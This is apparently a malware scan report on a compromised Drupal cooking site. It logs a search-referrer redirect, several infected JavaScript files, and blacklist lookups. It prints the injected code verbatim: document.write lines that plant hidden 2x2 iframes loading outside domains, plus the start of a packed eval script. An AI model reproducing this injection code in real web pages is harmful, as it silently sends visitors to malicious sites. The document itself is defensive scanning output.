Malicious/Suspicious Redirects
Request:
URL: http://helpingyoucook.com/ (imitation of visitor from search engine)
GET / HTTP/1.1
Host: helpingyoucook.com
Referer: http://www.google.com/search?q=redirect+check1
Server response:
HTTP/1.1 302 Found
Connection: close
Date: Fri, 05 Sep 2014 03:47:22 GMT
Location: http://candice-accola.org/mldt.html?h=2164471
Server: Apache/2.2.27 (Unix) mod_ssl/2.2.27 OpenSSL/1.0.1e-fips mod_bwlimited/1.4 FrontPage/5.0.2.2635 mod_auth_passthrough/2.1
Content-Length: 410
Content-Type: text/html; charset=iso-8859-1
Status: malicious
Scanned pages/files
Request | Server response | Status |
http://helpingyoucook.com/ | 200 OK Content-Length: 4110 Content-Type: text/html | clean |
http://helpingyoucook.com/?q=user/register | 200 OK Content-Length: 4800 Content-Type: text/html | clean |
http://helpingyoucook.com/misc/jquery.js?B | 200 OK Content-Length: 24576 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below)
document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://candice-accola.org/mldt.html?j=2164471></iframe>');
document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://motorscooters.com/oldy.html?j=2164471></iframe>');
document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://bandofbros.us/ehgu.html?j=847453></iframe>');
document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://gabriellerosephotography.com/empu.html?j=847453></iframe>');
document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://findautorebates.com/eagn.html?j=847453></iframe>');
eval(function(p ...[3345 bytes skipped]...
Antivirus reports:
Hidden iFrame found. size: 2x2 src: http://motorscooters.com/oldy.html?j=2164471
<iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://motorscooters.com/oldy.html?j=2164471>
Hidden iFrame found. size: 2x2 src: http://findautorebates.com/eagn.html?j=847453
<iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://findautorebates.com/eagn.html?j=847453>
Malicious iFrame found. size: 2x2 src: http://bandofbros.us/ehgu.html?j=847453
This URL is marked by Google as suspicious
<iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://bandofbros.us/ehgu.html?j=847453>
Hidden iFrame found. size: 2x2 src: http://gabriellerosephotography.com/empu.html?j=847453
<iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://gabriellerosephotography.com/empu.html?j=847453>
Hidden iFrame found. size: 2x2 src: http://candice-accola.org/mldt.html?j=2164471
<iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://candice-accola.org/mldt.html?j=2164471>
http://helpingyoucook.com/misc/drupal.js?B | 200 OK Content-Length: 10809 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below)
document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://candice-accola.org/mldt.html?j=2164471></iframe>');
document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://motorscooters.com/oldy.html?j=2164471></iframe>');
document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://bandofbros.us/ehgu.html?j=847453></iframe>');
document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://gabriellerosephotography.com/empu.html?j=847453></iframe>');
document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://findautorebates.com/eagn.html?j=847453></iframe>');
var Drupal = Dr ...[3580 bytes skipped]...
Antivirus reports:
Hidden iFrame found. size: 2x2 src: http://candice-accola.org/mldt.html?j=2164471
<iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://candice-accola.org/mldt.html?j=2164471>
Hidden iFrame found. size: 2x2 src: http://motorscooters.com/oldy.html?j=2164471
<iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://motorscooters.com/oldy.html?j=2164471>
Malicious iFrame found. size: 2x2 src: http://bandofbros.us/ehgu.html?j=847453
This URL is marked by Google as suspicious
<iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://bandofbros.us/ehgu.html?j=847453>
Hidden iFrame found. size: 2x2 src: http://gabriellerosephotography.com/empu.html?j=847453
<iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://gabriellerosephotography.com/empu.html?j=847453>
Hidden iFrame found. The same iFrame was found in 9 websites. size: 2x2 src: http://offtherunwayhairstudio.com/ahgu.html
<iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://offtherunwayhairstudio.com/ahgu.html>
Hidden iFrame found. size: 2x2 src: http://findautorebates.com/eagn.html?j=847453
<iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://findautorebates.com/eagn.html?j=847453>
http://helpingyoucook.com/modules/user/user.js?B | 200 OK Content-Length: 7837 Content-Type: application/javascript | malicious |
Malicious code found. Script contains blacklisted domain: bandofbros.us
document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://candice-accola.org/mldt.html?j=2164471></iframe>');
document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://motorscooters.com/oldy.html?j=2164471></iframe>');
document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://bandofbros.us/ehgu.html?j=847453></iframe>');
document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://gabriellerosephotography.com/empu.html?j=847453></iframe>');
Drupal.behaviors.password = function(context) { var translate = Drupal.settings.password; $("input.password-field:not(.password-processed)", context).each(function() { var passwo ...[3566 bytes skipped]...
Decoded script:
<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://candice-accola.org/mldt.html?j=2164471></iframe>
<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://motorscooters.com/oldy.html?j=2164471></iframe>
<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://bandofbros.us/ehgu.html?j=847453></iframe>
<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://gabriellerosephotography.com/empu.html?j=847453></iframe>
Hidden iFrame found. size: 2x2 src: http://motorscooters.com/oldy.html?j=2164471
<iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://motorscooters.com/oldy.html?j=2164471>
Malicious iFrame found. size: 2x2 src: http://bandofbros.us/ehgu.html?j=847453
This URL is marked by Google as suspicious
<iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://bandofbros.us/ehgu.html?j=847453>
Hidden iFrame found. The same iFrame was found in 9 websites. size: 2x2 src: http://offtherunwayhairstudio.com/ahgu.html
<iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://offtherunwayhairstudio.com/ahgu.html>
Hidden iFrame found. size: 2x2 src: http://gabriellerosephotography.com/empu.html?j=847453
<iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://gabriellerosephotography.com/empu.html?j=847453>
Hidden iFrame found. size: 2x2 src: http://candice-accola.org/mldt.html?j=2164471
<iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://candice-accola.org/mldt.html?j=2164471>
http://helpingyoucook.com/?q=user | 200 OK Content-Length: 3153 Content-Type: text/html | clean |
http://helpingyoucook.com/?q=user/password | 200 OK Content-Length: 2799 Content-Type: text/html | clean |
http://helpingyoucook.com/test404page.js | 404 Not Found Content-Length: 512 Content-Type: text/html | clean |
http://helpingyoucook.com/?q=node/3 | 200 OK Content-Length: 3755 Content-Type: text/html | clean |
http://helpingyoucook.com/?q=user/login&destination=comment%2Freply%2F3%23comment-form | 200 OK Content-Length: 3195 Content-Type: text/html | clean |
http://helpingyoucook.com/?q=user/register&destination=comment%2Freply%2F3%23comment-form | 200 OK Content-Length: 4851 Content-Type: text/html | clean |
http://helpingyoucook.com/?q=node/2 | 200 OK Content-Length: 3700 Content-Type: text/html | clean |
http://helpingyoucook.com/?q=user/login&destination=comment%2Freply%2F2%23comment-form | 200 OK Content-Length: 3195 Content-Type: text/html | clean |
http://helpingyoucook.com/?q=user/register&destination=comment%2Freply%2F2%23comment-form | 200 OK Content-Length: 4851 Content-Type: text/html | clean |
http://helpingyoucook.com/?q=rss.xml | 200 OK Content-Length: 1135 Content-Type: application/rss+xml | clean |
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=helpingyoucook.com
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://helpingyoucook.com/
Result: helpingyoucook.com is not infected or malware details are not published yet.